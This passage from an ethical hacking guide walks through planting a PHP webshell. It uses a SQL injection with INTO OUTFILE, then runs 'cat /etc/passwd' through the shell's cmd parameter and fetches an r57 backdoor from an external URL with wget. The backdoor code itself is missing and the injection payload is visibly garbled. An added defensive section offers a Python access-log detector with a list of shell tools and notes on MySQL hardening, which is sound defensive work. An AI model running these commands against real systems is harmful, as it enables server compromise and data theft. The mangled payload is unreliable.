Ethical Hacking and Penetration Testing Guide
/var/www directory, which is our current directory that happens to be writable. You can determine the current directory by executing the datadir() function.
Our simple one-line backdoor is as follows:
This will let us execute system commands via the GET parameter cmd. The passthru() function in PHP allows us to execute arbitrary commands on the system. To write files into the directory, we will use the INTO OUTFILE command and specify the directory.
Syntax
http://localhost/index.php?support=yes' and 1=0 UNION SELECT 1,GET[\'cmd'\')]);>,3,4,5,6 INTO OUTFILE '/var/www/shell.php' --
Since the command is quite simple, it will write the PHP code in the column to a file named shell.php. If everything goes fine, our backdoor should be uploaded and we can easily execute commands via the cmd parameter. Let's try reading /etc/passwd.
Syntax
http://localhost/shell.php?cmd=cat /etc/passwd
Here, we can execute our commands on the target system, which is Linux based, so we try to read Linux-specific files. If it were running a Windows OS, we would have tried to read files such as "boot.ini" or "winboot.ini".
Since we are now able to execute commands on the system, we will try to download a more powerful backdoor from an external URL and write it onto the system. We can use wget to download a file from an external location, with the -O parameter to write the downloaded file to a particular location.
Syntax
wget "http://target.com/r57.txt" -O r57.php
Now, we can directly access our r57.php shell at the following URL:
http://localhost/r57.php
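From the defender's side, both stages described above (the UNION SELECT ... INTO OUTFILE write and the later ?cmd= requests to the dropped file) leave distinctive traces in the web server access log. The following is an added example, not code from the book, that scans combined-format log lines for those two signatures; the sample log lines and IP addresses are constructed for the demonstration, and the command-name list is a deliberately small assumption that a real deployment would tune.

```python
import re
from urllib.parse import unquote_plus

# Stage 1: UNION-based injection that writes a file via INTO OUTFILE / DUMPFILE.
SQLI_FILE_WRITE = re.compile(r"union\s+(?:all\s+)?select\b.*\binto\s+(?:out|dump)file\b", re.I | re.S)
# Stage 2: a cmd= parameter whose value starts with a shell command (assumed short list).
CMD_PARAM = re.compile(r"[?&]cmd=([^&\s]*)", re.I)
SHELL_COMMAND = re.compile(r"^(?:cat|wget|curl|id|uname|ls|whoami|nc)\b", re.I)
# Apache/nginx combined log format: client IP, timestamp, method, path, status code.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')

def decode_url(url, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads (%2527) are not missed."""
    for _ in range(rounds):
        decoded = unquote_plus(url)
        if decoded == url:
            break
        url = decoded
    return url

def classify_request(path):
    """Return finding labels for one request path (empty list if nothing matched)."""
    decoded = decode_url(path)
    findings = []
    if SQLI_FILE_WRITE.search(decoded):
        findings.append("sqli_into_outfile")
    m = CMD_PARAM.search(decoded)
    if m and SHELL_COMMAND.match(m.group(1).lstrip()):
        findings.append("webshell_cmd_param")
    return findings

def scan_access_log(text):
    """Return (ip, path, findings) for every log line that produced a finding."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, _method, path, _status = m.groups()
        findings = classify_request(path)
        if findings:
            hits.append((ip, path, findings))
    return hits

# Constructed sample log: a benign request, the OUTFILE write to /var/www/shell.php,
# a command sent through the dropped file, and a harmless cmd= value (no finding).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?support=yes HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?support=yes%27%20and%201=0%20UNION%20SELECT%201,2,3,4,5,6%20INTO%20OUTFILE%20%27/var/www/shell.php%27%20-- HTTP/1.1" 200 88
203.0.113.7 - - [10/Oct/2023:13:55:50 +0000] "GET /shell.php?cmd=cat%20/etc/passwd HTTP/1.1" 200 1902
198.51.100.4 - - [10/Oct/2023:13:56:02 +0000] "GET /about.php?cmd=help HTTP/1.1" 200 300
"""
```

The OUTFILE stage is also blocked outright on a MySQL server whose secure_file_priv is set to a directory outside the web root, and whose application account lacks the FILE privilege, so the log rule is a second layer rather than the only one.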